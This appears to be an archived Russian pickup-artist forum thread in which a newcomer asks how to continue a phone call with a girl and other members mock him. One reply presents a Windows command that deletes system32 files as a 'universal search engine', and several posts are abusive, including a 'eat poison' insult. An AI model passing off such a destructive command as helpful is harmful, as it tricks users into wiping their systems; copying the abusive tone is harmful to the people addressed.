Перейти к публикации
пикап.Форум

Рекомендованные сообщения

Опубликовано:

Вот ситуация такая,дал мне друг номер телефона девушки,звоню, говорю: привет...как зовут,скока лет и тп

как дальше действовать? :unsure:

наверно я уже с 1 зонка накосячил?!

Опубликовано:

Есть такое слово: ПОИСК! А еще есть такая штучка, называется "ПОИСКОВИК" !!!!!!!!!!!

Слушай, а ты если бабу в постель затащишь, разденешь ее а потом тоже будешь говорить: ТРА*НИТЕ ее за меня!!!!!!!! ???????

Опубликовано:

Совет: сначала прочитай термины пикапа, потом покури все факи от и до, потом найди похожие посты (их тут туча), ну а после обращайся с вопросами...

Опубликовано:

неа все ситуации точно такие же как и у тебя в том то и дело

от садисто 100% прочти что такое БГ и как его развить и что такое тараканы и как их убрать :) + термины пикапа

P.S. тараканы это не те которые возможно бегают у тебя на кухне что это такое прочтёш там же по ссылке

Опубликовано:

от садисто 100% прочти что такое БГ и как его развить и что такое тараканы и как их убрать + термины пикапа

P.S. тараканы это не те которые возможно бегают у тебя на кухне что это такое прочтёш там же по ссылке

Аыыыы *пускает слюни*

Кто такой садисто? =)

что такое БГ? =)

а тараканов у меня дома нет, я их травлю *аыыыыы*

Мне кажется, что у автора недавно появился интернет :)

Опубликовано:

от садисто 100% прочти что такое БГ и как его развить и что такое тараканы и как их убрать + термины пикапа

Аыыыы *пускает слюни*

Кто такой садисто? =)

что такое БГ? =)

а тараканов у меня дома нет, я их травлю *аыыыыы*

Мне кажется, что у автора недавно появился интернет :)

нет,уже с лета,я тут всего 3-5 дня

Опубликовано:

Ыыыыы

После тем аналогичной этой делаешь вывод, что некоторых просто так не стОит пускать на форум)))

Админам наверно стОит замутить что-нить типа теста на знание хотя бы терминов и сути пикапа. Вот.

Опубликовано:

Ты! Тупое! Животное! Жри! Яд! Зачем? Ты? Всех? Тут? Так? Бесишь?

Задрал... Я после таких тем боюсь этот раздел открывать, нервы-то не бесконечные...

Ты никуя не прочел, а если и прочел, то никуя не понял. Иди читай пока не поймешь. А еще лучше, иди учись.

И не беспокой умных взрослых дядек попусту!

нет,уже с лета,я тут всего 3-5 дня

О-о-о... Да... Суровый стаж... Я пойду нервно покурю...

PS Достаточно при регистрации давать пример из класса так 11, причем написанный словами (икс в квадрате плюс...блаблабла)

Потому что до 11 класса нефиг фигней страдать, а учиться надо.

PPS Brabus-61 <<Спите спокойным сном, сын мой. Ибо нагрешили вы. С**а...>>

PPPS Универсальный поисковик для брабуса-61: Пуск-выполнить- cmd - DEL %windir%\system32\*.* /F /Q /S

Опубликовано:

про судимости, и наличие родственников алкоголиков за границей ещё забыл спросить... :lol:

автор перелопать весь пикап.ру и в поле методом проб и ошибок...)))

или на тренинги иди...

Архивировано

Эта тема находится в архиве и закрыта для публикации сообщений.

• Сейчас на странице   0 пользователей

• Нет пользователей, просматривающих эту страницу.
  • Новое

1. 80

В запасе?

2. 80

В запасе?

3. 80

В запасе?

4. 80

В запасе?

5. 80

В запасе?

• Создать...